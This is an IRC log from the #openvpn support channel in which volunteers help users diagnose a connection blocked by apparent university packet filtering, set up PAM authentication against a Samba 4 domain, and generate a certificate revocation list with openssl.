udp? 03:50 < pppingme> yes 03:50 < pekster> tcpdump -pni eth0 udp port 443 03:50 < pekster> man tcpdump 03:50 < josheee12> oh, sorry. 
03:50 < pppingme> the name is misleading.. 03:50 < josheee12> that it is. 03:51 -!- brute11k [~brute@89.249.235.131] has joined #openvpn 03:52 < josheee12> the client is doing a number of writes, but the server doesn't seem to get them. 03:53 < pppingme> can you ping the server cleanly from the client? You aren't seeing a ton of packet loss or anything are you? 03:54 < josheee12> tcpdump: http://pastebin.com/KSsX1A1t 03:54 < josheee12> ifconfig reports none dropped on either end. 03:55 < josheee12> pings work fine. 03:56 < pppingme> this has worked before, or is this a new setup? 03:56 < josheee12> it's worked for months. 03:59 < pppingme> are there other clients that use this same server? are they working or broken? 03:59 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 04:00 < josheee12> this is the only client as of right now. i can install openvpn on a virtual machine as a test if need be, although i'd generally like to avoid it. 04:00 < pppingme> when is the last time it worked? 04:01 < josheee12> last time i tried to go online with this computer was roughly 4 days ago. 04:01 < pppingme> tried? so it worked? 04:01 < josheee12> yes. 04:02 < pppingme> ok, the ever important question, what has changed since last time it worked? 04:02 < josheee12> literally nothing except daylight savings time. after it stopped working, i upgraded both the client and server to the latest release. 04:03 < pppingme> so you updated after it broke in an attempt to fix it? or you updated then it broke? 04:03 < josheee12> i updated in an attempt to fix. 04:03 <@EugeneKay> "nothing changed except everything" 04:05 < pekster> Why would ifconfig report dropped packets which it never received? 04:05 < pekster> You need to dump BOTH ends. Then you compare the packets sent on the server that obviously aren't getting to your client 04:05 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 04:05 < josheee12> alright. 
04:05 < pppingme> as a general rule, after something breaks is the WORST time to start doing upgrades
04:06 < pppingme> but yeah, start by doing tcpdumps on both and compare, see if packets are getting lost
04:06 < josheee12> will do
04:06 < pekster> Honestly, we prefer people here use the latest version
04:07 < josheee12> i'm changing to port 5555, only because i've got a lot of stuff up on this computer and i'd expect unrelated traffic on 443 as a result.
04:08 < pppingme> generally agree that current versions are good, but if you do an upgrade when you're broke, you don't know if the upgrade is further complicating whatever is broke... the only exception is if you know for sure that there is a fix for your specific problem in the upgrade.
04:08 < pekster> josheee12: What on earth are you running on UDP port 443
04:09 < pekster> It's not going to match web traffic. That uses TCP...
04:09 < josheee12> very true, i feel like a moron at the moment.
04:09 < pekster> No clue what else you're expecting to use UDP 443.
04:11 < josheee12> there's clearly packet loss, a number are being sent client-side and never get received.
04:12 < pppingme> from the client, "ping -c 240 -f serverip"
04:13 < pppingme> and paste the two stat lines
04:13 < pekster> Judging by the W's and no R's on the client, same is true in reverse (looks like the server isn't verb 5 in the logs from earlier.) If your network connection is bad enough that it can't negotiate a TLS handshake in the 60 second window, you need to fix that first
04:15 < josheee12> pppingme: "ping: cannot flood; minimal interval, allowed for user, is 200ms"
04:15 < pppingme> do it as root
04:15 < pppingme> or sudo
04:16 < josheee12> pekster: i'm currently on a 10gbps fibre line, i doubt it's an issue with the network itself.
04:16 < pekster> And these 2 systems are directly connected via a fiber network to each other?
04:16 < josheee12> pekster: no
04:16 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Ping timeout: 250 seconds]
04:16 < pekster> If they're not, you have a slew of routers between each system that could all be causing problems. Active filtering, misconfigured routers, MTU issues, transparent proxying
04:16 < pekster> List goes on
04:17 < pppingme> ping results?
04:17 < josheee12> pppingme: can i paste those 2 lines directly here?
04:17 -!- xbanux [~xbanux@115.254.75.113] has quit [Ping timeout: 264 seconds]
04:17 < pppingme> yeah, it's just two lines
04:17 < josheee12> 240 packets transmitted, 240 received, 0% packet loss, time 3194ms
04:17 < josheee12> rtt min/avg/max/mdev = 29.134/29.911/49.147/1.823 ms, pipe 4, ipg/ewma 13.364/29.502 ms
04:18 < pppingme> hmm, that's clean'ish, try a larger count, 2500
04:19 < josheee12> pekster: the traceroute only has 10 hops. most of them are level 3 (all but 3), so i'd be surprised if it was the network of the server or client.
04:19 < pekster> What's that going to accomplish? TLS handshakes send on the order of a dozen packets, not 2500
04:19 < pppingme> luck, timing, just trying to show any packet loss at all..
04:19 < pppingme> if we don't get any with the larger sample, it's probably some kind of filtering or flood control
04:19 < pekster> ...
04:20 < josheee12> there was still 0% loss.
04:20 < pppingme> what was the avg and max time on that one?
04:21 < pekster> josheee12: Can you cloudshark the results from 'tcpdump -pni eth0 udp port 443' from both client & server ends starting from when you attempt to connect with the client?
04:21 < josheee12> 29.6/32.5.
04:21 < pekster> It's curious that you get 'initial packet received' messages on both ends but no return packets that verb 5 catches on your client
04:21 < pppingme> super reasonable, doesn't look like typical packet loss, did you change any iptables rules on either end?
04:22 -!- zz_AsadH is now known as AsadH
04:23 < pekster> I'd like to see what the sent/received looks like on both ends. It's possible you have a PMTU problem on the link between the hosts. Ultimately if you have dropped/filtered/otherwise-undeliverable packets on your control channel, that needs to get fixed
04:24 < josheee12> no. only rules on the client are to make a few IP ranges use eth0, and only rules on the server are postrouting for openvpn. pekster, how do you suggest i do that?
04:25 < pekster> tcpdump -pni eth0 -w capture.pcap udp port 443
04:25 < josheee12> pekster: just tcpdump and pipe to files?
04:25 < pekster> capture, send to www.cloudshark.org
04:25 < josheee12> k
04:26 < pekster> Be sure to start it on both ends before you connect the client; I want to see that initial packet they both send, and then see what else doesn't make the connection
04:27 < josheee12> alright. give me a moment for everything to time out.
04:27 < pekster> If you bounce both ends' services it'll do so without needing 60 seconds for it to fail
04:28 < pekster> Disconnecting the client is instant; the client won't try any more if it's not running ;)
04:31 < josheee12> client: http://www.cloudshark.org/captures/03af6807d7d7
04:31 <@vpnHelper> Title: CloudShark (at www.cloudshark.org)
04:31 < josheee12> server: http://www.cloudshark.org/captures/40d461d0e1ad
04:31 <@vpnHelper> Title: CloudShark (at www.cloudshark.org)
04:32 -!- ngharo_ [~ngharo@hacked.thegov.us] has joined #openvpn
04:32 -!- Varazir_ [~mircwars@c-94-255-130-176.cust.bredband2.com] has joined #openvpn
04:34 -!- AsadH is now known as AsadH_runsaway
04:35 < pekster> Yea, weird, the server just "never gets" anything after the first 3 packets are exchanged
04:35 -!- AsadH_runsaway is now known as AsadH
04:35 < pekster> Almost looks to me like some IDS or DPI system is eating them
04:36 -!- Netsplit *.net <-> *.split quits: ngharo, paccer, pa, Varazir
04:36 < pekster> The lost packets are low enough it wouldn't be MTU issues either
04:39 < josheee12> i reside at my uni, so the traffic goes laptop->personal router->building router->school main router->FLR (our isp)->level 3->tinet->2 internal switches->openvz host node->server VPS.
04:39 < pekster> I don't know what traceroute tool you have, but can you try watching tcpdump on the server (interactive is fine, no need to cloudshark this) and see if you get a hit when you do this on the client: traceroute -F -p 5555 -q 3
04:39 < pekster> Ah, then you very likely have DPI/IDS done to stop you
04:40 < pekster> You can try to trace things, but my guess is that they've blocked OpenVPN for a reason, or possibly a variety of traffic that openvpn falls into a rule for
04:40 < josheee12> why would this suddenly stop working? they haven't changed any hardware (all network upgrades are announced) in my building or centrally.
04:40 < pekster> Someone changed something somewhere?
04:40 * pekster shrugs
04:41 < pekster> Your issue is obvious: packets don't arrive where they're supposed to. In fact, by varying the TTL of the outgoing packets, you can probably see exactly where they get dropped
04:41 < josheee12> i just texted my friend who also uses openvpn here to see if he's had issues.
04:42 < pekster> Something like this is very bad to set in production, but for testing, will match those UDP packets that are 151 bytes long, but not the first 3 that are smaller:
04:43 < pekster> iptables -t mangle -A POSTROUTING -m udp -p udp --dport 5555 -m length --length 100: -j TTL --ttl-set 4
04:43 < pekster> Play around with the TTL to see what 2 adjacent values do produce and then don't produce an ICMP error for TTL expired
04:44 < pekster> That's your "naughty" host doing the filtering
04:44 < josheee12> alright
04:44 < pekster> Oh, and edit the rule, not just keep adding new ones :P
04:44 < pekster> But, your issue isn't openvpn anymore; it's some packet filtering system
04:44 -!- pa [~pa@unaffiliated/pa] has joined #openvpn
04:44 < josheee12> according to my friend who uses openvpn here, it's not an issue for him.
04:45 < josheee12> i may disconnect for a second, i didn't think to try wifi as an alternative.
04:46 -!- josheee121 [~jsteiner@131.91.4.12] has joined #openvpn
04:47 -!- josheee12 [~jsteiner@131.91.7.1] has quit [Quit: Leaving.]
04:49 -!- josheee12 [~jsteiner@131.91.7.1] has joined #openvpn
04:51 -!- josheee121 [~jsteiner@131.91.4.12] has quit [Ping timeout: 258 seconds]
04:55 < josheee12> it's definitely an issue with my network, i can't connect to my friend's server, either. which is surprising, because he was using the wireless and it worked earlier today. sorry for all the hassle.
04:56 < pekster> Bonus points if you can find the responsible router IP and give it to your netadmins. Or publish it in a school paper; maybe then the guys at netops will think twice before rolling out packet filtering without notice ;)
04:58 < josheee12> lol. it can literally only be 1 of 2 routers. i personally know a decent portion of the netadmins, so i'll be stopping by the IT office tomorrow to inquire further.
05:03 -!- brute11k [~brute@89.249.235.131] has quit [Ping timeout: 246 seconds]
05:06 -!- brute11k [~brute@89.249.235.131] has joined #openvpn
05:06 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection]
05:06 < josheee12> the funniest part, in my opinion, is that the school itself uses openvpn.
05:07 < josheee12> (for certain remote access things for employees; i also work for the school and have to use openvpn for certain work)
05:21 -!- JSharpe [~JSharpe@46.165.208.207] has joined #openvpn
05:32 -!- dazo_afk is now known as dazo
05:36 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn
05:46 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
06:00 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection]
06:08 -!- mndo [~mndo@bl17-85-80.dsl.telepac.pt] has joined #openvpn
06:11 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
06:16 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
06:31 -!- josheee12 [~jsteiner@131.91.7.1] has left #openvpn ["PING 1363174178"]
06:37 -!- paccer [uid4847@gateway/web/irccloud.com/x-yfkfkdnmzaewasrg] has joined #openvpn
06:42 -!- mustu [~maan@unaffiliated/mustu] has quit [Ping timeout: 256 seconds]
07:11 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Read error: Connection reset by peer]
07:16 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
07:18 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 240 seconds]
07:20 -!- mustu [~maan@182.185.186.30] has joined #openvpn
07:20 -!- mustu is now known as Guest40046
07:26 -!- Varazir_ is now known as Varazir
07:46 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 240 seconds]
07:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
08:14 -!- Holiday [~rjr162@magichat.dlt.psu.edu] has quit [Read error: Connection reset by peer]
08:21 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn
08:25 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit []
08:27 -!- sw0rdfish [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has joined #openvpn
08:30 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds]
08:32 -!- sw0rdfish [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has quit [Changing host]
08:32 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn
08:41 -!- kubbing [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has joined #openvpn
08:45 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
08:48 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn
08:48 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
09:03 -!- xbanux [~xbanux@115.254.75.113] has joined #openvpn
09:10 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
09:10 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
09:28 -!- marksaitis [~marksaiti@194.168.230.106] has joined #openvpn
09:31 -!- Guest40046 [~maan@182.185.186.30] has quit [Ping timeout: 264 seconds]
09:40 -!- fahmad [~linux@unaffiliated/fahmad] has joined #openvpn
09:44 -!- mustu [~maan@119.63.130.93] has joined #openvpn
09:44 -!- mustu is now known as Guest21539
09:52 < tabakhase> arg?
09:52 < tabakhase> is this channel on a mode to "not be joinable by web clients"?
09:53 < tabakhase> nerv... however, so i'm back at my desk to present you that fancy logfile of a linux client that "stopped working" after it was working yesterday - http://nopaste.info/f3e4079ebb.html
09:54 < tabakhase> it goes ok - ok - ok - dead.
10:09 -!- erry [erry@freenode/staff/erry] has quit [Ping timeout: 608 seconds]
10:12 <@plaisthos> tabakhase: ban mask on webchannel user?
10:14 <@dazo> yes, web irc clients are banned ... as it's only noise from those visitors
10:14 <@dazo> * stupid user logs in
10:14 <@dazo> stupid user> Why doesn't it work?
10:14 <@dazo> * stupid user logs out
10:15 < fahmad> hey dazo
10:15 < fahmad> plaisthos :)
10:15 -!- erry [erry@freenode/staff/erry] has joined #openvpn
10:16 < tabakhase> ;D - btw my problem is fixed, don't bother checking the log
10:16 < fahmad> :)
10:17 -!- Bakz [~meh@58.34.36.134] has quit [Quit: Leaving]
10:17 < tabakhase> seems "someone" only typed the restart command into the shell but missed hitting the enter button...
10:18 -!- raidz_away is now known as raidz
10:20 < fahmad> great
10:25 < fahmad> dazo: i have a scenario; if i have an openvpn server running on a machine which has 10 static ip addresses located in New York, and i want one of my clients in Germany to connect to the VPN server and get a static ip into his DD-WRT Router, and if we ping it from the internet, not from the server, it will give us a ping response. any idea on this?
10:26 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
10:31 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving]
10:31 -!- mndo [~mndo@bl17-85-80.dsl.telepac.pt] has quit [Ping timeout: 258 seconds]
10:35 -!- mndo [~mndo@bl17-85-80.dsl.telepac.pt] has joined #openvpn
10:39 -!- marksaitis [~marksaiti@194.168.230.106] has quit [Ping timeout: 258 seconds]
10:44 -!- Guest21539 [~maan@119.63.130.93] has quit [Ping timeout: 264 seconds]
10:50 -!- mustu [~maan@119.63.130.93] has joined #openvpn
10:50 -!- mustu is now known as Guest2561
10:55 -!- TheWarden_ [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn
10:56 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer]
10:56 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
10:58 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Ping timeout: 260 seconds]
10:58 -!- TheWarden_ is now known as TheWarden
10:59 -!- Guest2561 [~maan@119.63.130.93] has quit [Ping timeout: 260 seconds]
11:04 -!- mcp [~mcp@wolk-project.de] has quit [Read error: Operation timed out]
11:06 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-pgmyjmlyrhmelakt] has quit [Ping timeout: 245 seconds]
11:07 -!- mustu_ [~maan@119.63.130.93] has joined #openvpn
11:12 -!- mcp [~mcp@wolk-project.de] has joined #openvpn
11:13 -!- AsadH is now known as zz_AsadH
11:18 -!- mustu_ [~maan@119.63.130.93] has quit [Ping timeout: 264 seconds]
11:26 -!- riot [~riot@eris.hackerfleet.org] has joined #openvpn
11:26 < riot> hi.
11:26 < riot> i'm trying to run a vpn on a host-only virtualbox interface that shares a network with all running VMs, but my clients can only ping the vpn server, not the rest of the net
11:27 -!- kubbing [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has quit [Remote host closed the connection]
11:32 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
11:35 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
11:35 < TheWarden> ahh I'm pretty new to OpenVPN, is this web GUI shown here http://openvpn.net/index.php/access-server/docs/admin-guides/190-how-to-authenticate-users-with-active-directory.html for the commercial OpenVPN product or OpenVPN Community edition?
11:35 <@vpnHelper> Title: How to authenticate users with Active Directory (at openvpn.net)
11:52 < TheWarden> where do I get this auth pam so I can authenticate the VPN to active directory?
11:54 < TheWarden> even if PAM is the answer, where the heck are the plugins? I don't seem to have it
11:55 < tabakhase> riot what is your config line claiming the ips/net?
11:55 < tabakhase> riot you're looking for something similar to "server-bridge 172.20.23.254 255.255.254.0 172.20.22.50 172.20.22.250"
11:57 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer]
12:00 -!- mustu [~maan@221.120.210.138] has joined #openvpn
12:00 -!- mustu is now known as Guest56224
12:03 -!- fahmad [~linux@unaffiliated/fahmad] has quit []
12:04 -!- Guest56224 [~maan@221.120.210.138] has quit [Ping timeout: 240 seconds]
12:05 -!- mustu_ [~maan@119.63.130.93] has joined #openvpn
12:11 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
12:13 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has joined #openvpn
12:15 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Remote host closed the connection]
12:15 < TheWarden> in order to have my OpenVPN server authenticate to Active Directory do I have to have the server itself joined to the domain?
12:16 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
12:21 <@dazo> TheWarden: that URL is to the Access Server (commercial version)
12:22 <@dazo> TheWarden: for PAM auth ... that should be shipped in your openvpn package (Community Edition) .... and the rest of the PAM stuff is whatever your OS shipped with
12:23 <@dazo> TheWarden: try to look into /usr/lib*/openvpn ... or some places like that
12:23 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn
12:24 -!- GabrieleV_ [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 260 seconds]
12:24 <@dazo> TheWarden: but for LDAP auth (which you most likely need for AD auth ... maybe RADIUS is another alternative) ... then you need an auth-ldap ... which is kind of trickier ... there are a few alternatives, but I've never dug into any of them for real yet
12:25 <@dazo> but some people do the Linux<->AD integration and then add openvpn + auth-pam on top of that
12:31 < TheWarden> dazo: I installed Samba via git.
12:31 <@dazo> TheWarden: then you probably use winbind?
12:32 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has quit [Ping timeout: 248 seconds]
12:32 -!- kubbing [~kubbing@89.177.146.18] has quit [Ping timeout: 252 seconds]
12:33 < TheWarden> dazo: See I'm in this situation, I don't know if I need PAM or LDAP or both. Yes I believe I am, as Samba 4 comes with it.
12:33 < TheWarden> so what I need is Linux to auth to active directory, openvpn to auth to active directory, and so on.
12:34 <@dazo> TheWarden: I've never played with Samba4 ... so I'm on really thin ice .... but I'd guess, if you can log into your Linux box with the username/password from a Windows account ... then you most likely need PAM
12:34 < TheWarden> ahh I found the shared object for auth-pam in /usr/lib/openvpn
12:34 <@dazo> you don't need both PAM and LDAP ... only one of them can be used at the same time in OpenVPN
12:35 < TheWarden> and I understand that Samba 4 has LDAP builtin
12:35 <@dazo> PAM is useful if you basically want the same auth schema as for your Linux users on that box
12:35 < uberushaximus> apparently samba is to the point where you configure it from a windows client
12:35 < uberushaximus> and it can do the whole AD forest
12:35 -!- master_o1_master [~master_of@p4FF24F8F.dip.t-dialin.net] has joined #openvpn
12:36 <@dazo> and LDAP is useful if you want to have "virtual users" on your VPN ... they are not known users for the Linux box itself
12:36 <@dazo> (but of course, you can do Linux login auth via LDAP as well ... but that's another chapter)
12:37 <@dazo> Yes, Samba4 ships with a lot of stuff embedded .... like krb5 support and LDAP .... but that's to be able to behave like an AD controller (or whatever the proper name is in the Microsoft world)
12:38 < TheWarden> dazo: in my case, the linux systems are servers. The samba 4/openvpn is on a linux server.. all users work on a workstation. So then PAM would be the answer?
12:38 <@dazo> I'd try that first
12:38 <@dazo> that's easiest
12:38 -!- BasicXP [~basicxp@ubuntu/member/BasicXP] has quit [Quit: Have to go. Good bye!]
12:39 < TheWarden> okay, so are you saying that if pam is setup then I can login to those servers using active directory?
12:39 -!- master_of_master [~master_of@p4FF24746.dip.t-dialin.net] has quit [Ping timeout: 260 seconds]
12:39 <@dazo> TheWarden: if you have configured your Linux boxes so that Windows users can log in with their accounts, then yes
12:40 < TheWarden> dazo: well I don't think I do presently but I'm going to join the servers to the domain so in theory they should be able to login.
12:40 <@dazo> I know from the Samba 3.x world that to make that work, you need the winbind daemon running ... which maps Windows accounts to Unix accounts, which makes them able to log in
12:41 <@dazo> but it is possible to do all this with LDAP too ... but I have no clue how to configure that, and esp. not against a Windows AD server
12:42 < TheWarden> ok
12:43 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn
12:44 < TheWarden> dazo: so you mean something like this, http://www.skelleton.net/2012/08/03/joining-a-debian-server-to-active-directory/?
12:44 <@vpnHelper> Title: Joining a Debian Server to Active Directory | skelleton.net (at www.skelleton.net)
12:45 <@dazo> TheWarden: that sounds quite correct ... and it even uses krb5 for authentication, which is good too
12:46 < TheWarden> dazo: mmm yet he suggests installing winbind but I have winbind and I have been able to kinit username already
12:47 <@dazo> TheWarden: you need winbind too ... that provides the mapping service between Windows user IDs and Unix user IDs
12:47 < TheWarden> dazo: oh okay, so that would explain why I don't see this server on the domain
12:48 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
12:48 <@dazo> TheWarden: did you successfully do: net ads join -U administrator ?
12:49 < TheWarden> dazo: ahh that would be from a windows workstation, I've never tried that but presently I'm authenticated to the domain via my workstation (Windows 7).
12:49 <@dazo> that should be run from the Linux box
12:49 -!- JSharpe [~JSharpe@46.165.208.207] has quit [Ping timeout: 245 seconds]
12:49 <@dazo> you want your Linux box to join the AD domain, to be able to do the further auths
12:49 < TheWarden> dazo: oh well there is no net command
12:50 <@dazo> It might be that this setup is for Samba 3
12:50 < TheWarden> so it is strange to have the server that is the Samba 4 AD DC be joined to the domain, basically itself lol ?
12:50 <@dazo> ahhh!
12:50 -!- JSharpe [~JSharpe@ip5-63-144-28.lon.ukinetcom.net] has joined #openvpn
12:50 <@dazo> I thought you had a Windows AD DC running already, and wanted to join that AD domain
12:51 <@dazo> well, then .... why do you setup Samba at all then?
12:51 <@dazo> do you want to provide Samba over VPN?
12:51 < TheWarden> I have Samba 4 AD DC setup and working. I can authenticate to it from a Windows workstation.
12:51 <@dazo> okay ... that's an important missing detail here
12:52 <@dazo> then you don't need to care about winbind at all
12:52 < TheWarden> I can see the users and computers that are joined to the domain. However the Linux Server itself that has Samba 4 is not showing up on the domain.
12:52 <@dazo> well, that sounds more like the smbd and nmbd daemons aren't running
12:52 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn
12:53 <@dazo> but that's not a topic for this channel .... Last time I configured Samba for file services was many years ago ... and for DC role, even longer ago
12:53 <@dazo> But for OpenVPN to work ... then you just need pure auth-pam
12:53 < TheWarden> mm okay, well either way I have to follow these steps http://www.skelleton.net/2012/08/03/joining-a-debian-server-to-active-directory/ to join other servers to the domain correct?
12:53 <@vpnHelper> Title: Joining a Debian Server to Active Directory | skelleton.net (at www.skelleton.net)
12:53 <@dazo> yes, that makes sense
12:53 < TheWarden> ahh okay, I'll move this to #samba then
12:54 < TheWarden> I'll fix that and then try to figure out how to get this auth-pam to work for OpenVPN to auth against the active directory.
12:55 <@dazo> TheWarden: when you can, from one of your other boxes, authenticate and login using an AD account ... then you can start to look at auth-pam
12:55 <@dazo> but not before
12:55 <@dazo> auth-pam expects a functional PAM auth
12:55 < TheWarden> dazo: I can do that now. I just have an issue it appears, like you were saying, that the server with the Samba 4 AD DC is not showing up on the domain itself.
12:56 <@dazo> okay, sort that out in #samba first ... just to ensure you have everything set up properly
12:57 <@dazo> (debugging issues when you believe your dependencies are working ... makes it even harder to find errors ... you need to know dependencies are working 100% correctly first)
12:59 < TheWarden> its okay
12:59 < TheWarden> found the server, it was me not thinking right. the server shows up under domain controllers. makes sense.
12:59 < TheWarden> so on with auth-pam somehow
13:02 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection]
13:03 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-wqqijxjunhrhjfkd] has joined #openvpn
13:05 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn
13:18 -!- Orbi [~opera@anon-163-5.vpn.ipredator.se] has joined #openvpn
13:19 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-jabwfdwwnubynxqd] has quit [Ping timeout: 245 seconds]
13:27 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-wqqijxjunhrhjfkd] has quit [Ping timeout: 276 seconds]
13:27 -!- paccer [uid4847@gateway/web/irccloud.com/x-yfkfkdnmzaewasrg] has quit [Ping timeout: 276 seconds]
13:27 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-otyxzvbrmvapfvtz] has quit [Ping timeout: 252 seconds]
13:27 -!- lmm [uid6417@gateway/web/irccloud.com/x-hunjxwmdptpgcgmf] has quit [Ping timeout: 245 seconds]
13:33 -!- kubbing [~kubbing@89.177.146.18] has quit [Ping timeout: 248 seconds]
13:34 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-gfejrjxrugpiqdyx] has joined #openvpn
13:37 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-zxcgkocqnpwnljgq] has joined #openvpn
13:48 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds]
13:48 -!- lmm [uid6417@gateway/web/irccloud.com/x-urrxqdulhckrxfpt] has joined #openvpn
13:48 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 264 seconds]
13:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 246 seconds]
13:57 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
14:09 -!- mndo [~mndo@bl17-85-80.dsl.telepac.pt] has quit [Ping timeout: 258 seconds]
14:17 -!- dzubey [~dzubey@68.14.254.195] has joined #openvpn
14:19 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds]
14:19 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn
14:21 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn
14:21 -!- master_of_master [~master_of@p4FF2446B.dip.t-dialin.net] has joined #openvpn
14:22 < TheWarden> Where can I find definitions of keywords in the server.conf? like tls-server or management or ccd-exclusive
14:23 -!- master_o1_master [~master_of@p4FF24F8F.dip.t-dialin.net] has quit [Read error: Operation timed out]
14:25 <@ecrist> !man
14:25 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend!
14:35 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
14:47 < TheWarden> how do I generate a file for crl-verify?
14:48 -!- dazo is now known as dazo_afk
14:51 < pekster> TheWarden: Are you using Easy-RSA? If so, when you perform the "revoke-full" command it'll update your CRL file in the process
14:52 < TheWarden> pekster: yes I'm using easy-rsa
14:52 < TheWarden> pekster: so to set it up to use a crl-verify I run that command without a common name?
14:52 < pekster> Oh, no, that command requires something to revoke
14:52 < TheWarden> pekster: oh so it's okay if I don't have a crl file initially until it's required to revoke a key?
14:53 < pekster> Yea, I'm looking at the 2.0 Easy-RSA, and it doesn't appear to support generating a blank CRL with a nice frontend command :\
14:53 < TheWarden> so is what I said true then?
14:53 < pekster> The new Easy-RSA 3.x stuff I'm working on lets you do that, but I just released the first prototype version today, so it's not something you want to use unless you're willing to run unstable code
14:53 < pekster> Well, you can do it by hand with openssl
14:54 < pekster> Something like this, assuming you're in the dir with all the command files and openssl.cnf:
14:54 < TheWarden> oh so my statement is not true.
14:54 < pekster> openssl ca -config openssl-1.0.0.cnf -gencrl -out keys/crl.pem
14:54 < pekster> I think
14:55 <@ecrist> !factoids search crl
14:55 <@vpnHelper> "crl" is (#1) --crl-verify A CRL (certificate revocation list) is used when a particular key is compromised but when the overall PKI is still intact. The only time when it would be necessary to rebuild the entire PKI from scratch would be if the root certificate key itself was compromised. or (#2) you can make use of CRL by using the revoke-full script in easy-rsa (packaged with openvpn) that
14:55 <@vpnHelper> will create the CRL file for you. ssl-admin will also build a crl for you
14:56 <@ecrist> pekster: that command is correct
14:56 < pekster> Hmm, on closer inspection, looks like you can call that without any arguments TheWarden. It'll spit some errors when it fails to find a cert to revoke, but it "should" play nice with the CRL generation, I believe
14:56 <@ecrist> !learn crl as openssl ca -config openssl-1.0.0.cnf -gencrl -out keys/crl.pem
14:56 <@vpnHelper> Error: You don't have the factoids.learn capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified.
14:57 <@ecrist> fuck you, vpnHelper
14:57 < pekster> ecrist: Yea, I just forgot offhand how the relative dir references worked with Easy-RSA 2.x. I'm already in 3.x mode today :)
14:57 < pekster> !learn crl as openssl ca -config openssl-1.0.0.cnf -gencrl -out keys/crl.pem
14:57 <@vpnHelper> Joo got it.
14:57 < pekster> I got annoyed with this one recently:
14:57 < pekster> !log
14:57 <@vpnHelper> Error: You don't have the owner capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified.
